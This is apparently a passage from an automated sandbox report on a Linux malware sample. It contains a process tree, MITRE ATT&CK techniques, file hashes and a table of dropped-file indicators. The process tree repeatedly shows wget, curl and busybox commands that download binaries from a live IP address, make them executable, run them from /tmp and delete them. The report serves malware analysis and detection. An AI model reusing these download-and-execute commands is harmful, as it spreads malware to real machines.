  /bin/busybox wget http://216.126.231.240/bins/1bZ9jnHrhv61tCZOW4vKbNotiwXsR8szGZ
  2⤵
  PID:967
- /bin/chmod
  chmod 777 1bZ9jnHrhv61tCZOW4vKbNotiwXsR8szGZ
  2⤵
  - File and Directory Permissions Modification
  PID:968
- /tmp/1bZ9jnHrhv61tCZOW4vKbNotiwXsR8szGZ
  ./1bZ9jnHrhv61tCZOW4vKbNotiwXsR8szGZ
  2⤵
  - Executes dropped EXE
  PID:969
- /bin/rm
  rm 1bZ9jnHrhv61tCZOW4vKbNotiwXsR8szGZ
  2⤵
  PID:970
- /usr/bin/wget
  wget http://216.126.231.240/bins/i04fYD7m6vDlAFPfuTp4is0wPgk9BLSCW0
  2⤵
  PID:971
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/i04fYD7m6vDlAFPfuTp4is0wPgk9BLSCW0
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:972
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/i04fYD7m6vDlAFPfuTp4is0wPgk9BLSCW0
  2⤵
  PID:973
- /bin/chmod
  chmod 777 i04fYD7m6vDlAFPfuTp4is0wPgk9BLSCW0
  2⤵
  - File and Directory Permissions Modification
  PID:974
- /tmp/i04fYD7m6vDlAFPfuTp4is0wPgk9BLSCW0
  ./i04fYD7m6vDlAFPfuTp4is0wPgk9BLSCW0
  2⤵
  - Executes dropped EXE
  PID:975
- /bin/rm
  rm i04fYD7m6vDlAFPfuTp4is0wPgk9BLSCW0
  2⤵
  PID:976
- /usr/bin/wget
  wget http://216.126.231.240/bins/IYOi3zv90gQ4rU8KLZ1UHsuPceFrCigyuQ
  2⤵
  PID:977
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/IYOi3zv90gQ4rU8KLZ1UHsuPceFrCigyuQ
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:978
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/IYOi3zv90gQ4rU8KLZ1UHsuPceFrCigyuQ
  2⤵
  PID:979
- /bin/chmod
  chmod 777 IYOi3zv90gQ4rU8KLZ1UHsuPceFrCigyuQ
  2⤵
  - File and Directory Permissions Modification
  PID:980
- /tmp/IYOi3zv90gQ4rU8KLZ1UHsuPceFrCigyuQ
  ./IYOi3zv90gQ4rU8KLZ1UHsuPceFrCigyuQ
  2⤵
  - Executes dropped EXE
  PID:981
- /bin/rm
  rm IYOi3zv90gQ4rU8KLZ1UHsuPceFrCigyuQ
  2⤵
  PID:982
- /usr/bin/wget
  wget http://216.126.231.240/bins/LKFtdQ9yQs6YWABNXrr8SGi2cjISyhRh2g
  2⤵
  PID:983
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/LKFtdQ9yQs6YWABNXrr8SGi2cjISyhRh2g
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:984
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/LKFtdQ9yQs6YWABNXrr8SGi2cjISyhRh2g
  2⤵
  PID:985
- /bin/chmod
  chmod 777 LKFtdQ9yQs6YWABNXrr8SGi2cjISyhRh2g
  2⤵
  - File and Directory Permissions Modification
  PID:986
- /tmp/LKFtdQ9yQs6YWABNXrr8SGi2cjISyhRh2g
  ./LKFtdQ9yQs6YWABNXrr8SGi2cjISyhRh2g
  2⤵
  - Executes dropped EXE
  PID:987
- /bin/rm
  rm LKFtdQ9yQs6YWABNXrr8SGi2cjISyhRh2g
  2⤵
  PID:988

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

File and Directory Permissions Modification

T1222

Linux and Mac File and Directory Permissions Modification

T1222.002

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/tmp/GfLiKIYH6Y7TcSa5uygF5EtPJPkBNSLk5J

Filesize
153B

MD5
998368d7c95ea4293237f2320546e440

SHA1
30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4

SHA256
533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736

SHA512
648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97

Download Submit

ioc	pid	Process
/tmp/GfLiKIYH6Y7TcSa5uygF5EtPJPkBNSLk5J	746	GfLiKIYH6Y7TcSa5uygF5EtPJPkBNSLk5J
/tmp/ol4qsFnxqEX3D1wp8MGKuhqpxU9bEas99d	752	ol4qsFnxqEX3D1wp8MGKuhqpxU9bEas99d
/tmp/1bZ9jnHrhv61tCZOW4vKbNotiwXsR8szGZ	807	1bZ9jnHrhv61tCZOW4vKbNotiwXsR8szGZ
/tmp/i04fYD7m6vDlAFPfuTp4is0wPgk9BLSCW0	813	i04fYD7m6vDlAFPfuTp4is0wPgk9BLSCW0
/tmp/IYOi3zv90gQ4rU8KLZ1UHsuPceFrCigyuQ	831	IYOi3zv90gQ4rU8KLZ1UHsuPceFrCigyuQ
/tmp/LKFtdQ9yQs6YWABNXrr8SGi2cjISyhRh2g	855	LKFtdQ9yQs6YWABNXrr8SGi2cjISyhRh2g
/tmp/KKZNRTjK2Os3nj6EIvLjb7QO2m6tKFpNto	861	KKZNRTjK2Os3nj6EIvLjb7QO2m6tKFpNto
/tmp/mkxzt2enVBSE1nQv90vQcoDPIj2NJbi5GC	867	mkxzt2enVBSE1nQv90vQcoDPIj2NJbi5GC
/tmp/yW1XYiXvkvFLpczBUtpSwxwEttm3KdQSev	873	yW1XYiXvkvFLpczBUtpSwxwEttm3KdQSev
/tmp/SnYqF3gM82ufhbjFjMRdYHCMHjaN5RicHD	879	SnYqF3gM82ufhbjFjMRdYHCMHjaN5RicHD
/tmp/YRTe6u2Dyfs7ThBSQh9oaLZ1ATRwJLg8S1	885	YRTe6u2Dyfs7ThBSQh9oaLZ1ATRwJLg8S1
/tmp/IMXTFMf2sGSbsalplAD3CM2xDEyIzuulnL	891	IMXTFMf2sGSbsalplAD3CM2xDEyIzuulnL
/tmp/pG0qqetnhFR4512JpyD7pyxXV3WA0x3JKz	897	pG0qqetnhFR4512JpyD7pyxXV3WA0x3JKz
/tmp/O7SiglMiy1JzDi5dhjdE0dEkFT2By8kgY0	903	O7SiglMiy1JzDi5dhjdE0dEkFT2By8kgY0
/tmp/KKZNRTjK2Os3nj6EIvLjb7QO2m6tKFpNto	909	KKZNRTjK2Os3nj6EIvLjb7QO2m6tKFpNto
/tmp/mkxzt2enVBSE1nQv90vQcoDPIj2NJbi5GC	915	mkxzt2enVBSE1nQv90vQcoDPIj2NJbi5GC
/tmp/yW1XYiXvkvFLpczBUtpSwxwEttm3KdQSev	921	yW1XYiXvkvFLpczBUtpSwxwEttm3KdQSev
/tmp/SnYqF3gM82ufhbjFjMRdYHCMHjaN5RicHD	927	SnYqF3gM82ufhbjFjMRdYHCMHjaN5RicHD
/tmp/YRTe6u2Dyfs7ThBSQh9oaLZ1ATRwJLg8S1	933	YRTe6u2Dyfs7ThBSQh9oaLZ1ATRwJLg8S1
/tmp/IMXTFMf2sGSbsalplAD3CM2xDEyIzuulnL	939	IMXTFMf2sGSbsalplAD3CM2xDEyIzuulnL
/tmp/pG0qqetnhFR4512JpyD7pyxXV3WA0x3JKz	945	pG0qqetnhFR4512JpyD7pyxXV3WA0x3JKz
/tmp/O7SiglMiy1JzDi5dhjdE0dEkFT2By8kgY0	951	O7SiglMiy1JzDi5dhjdE0dEkFT2By8kgY0
/tmp/GfLiKIYH6Y7TcSa5uygF5EtPJPkBNSLk5J	957	GfLiKIYH6Y7TcSa5uygF5EtPJPkBNSLk5J
/tmp/ol4qsFnxqEX3D1wp8MGKuhqpxU9bEas99d	963	ol4qsFnxqEX3D1wp8MGKuhqpxU9bEas99d
/tmp/1bZ9jnHrhv61tCZOW4vKbNotiwXsR8szGZ	969	1bZ9jnHrhv61tCZOW4vKbNotiwXsR8szGZ
/tmp/i04fYD7m6vDlAFPfuTp4is0wPgk9BLSCW0	975	i04fYD7m6vDlAFPfuTp4is0wPgk9BLSCW0
/tmp/IYOi3zv90gQ4rU8KLZ1UHsuPceFrCigyuQ	981	IYOi3zv90gQ4rU8KLZ1UHsuPceFrCigyuQ
/tmp/LKFtdQ9yQs6YWABNXrr8SGi2cjISyhRh2g	987	LKFtdQ9yQs6YWABNXrr8SGi2cjISyhRh2g